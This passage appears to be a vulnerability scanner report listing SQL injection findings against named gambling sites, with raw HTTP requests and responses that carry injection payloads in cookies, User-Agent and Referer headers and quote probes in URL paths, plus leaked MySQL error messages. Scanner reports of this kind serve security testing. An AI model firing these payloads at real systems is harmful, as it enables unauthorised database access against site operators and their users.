Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:03 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

Request 2

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d2--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:05 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:05 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Slots" />
<meta name="WT.cg_s" content="Startpage_Slots" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Slots');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino','Sl
...[SNIP]...

1.4. https://scratch.betsson.com/en/Sports/Bowling [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/Bowling

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 17123380'%20or%201%3d1--%20 and 17123380'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:10 GMT
Connection: close
Content-Length: 102693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino
...[SNIP]...

Request 2

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:12 GMT
Connection: close
Content-Length: 102706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/World-Champions

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:33 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView(
...[SNIP]...

Request 2

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:34 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="To
...[SNIP]...

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images'/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images''/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images/games_ENG.swf' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9685

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images/games_ENG.swf'' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources'/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
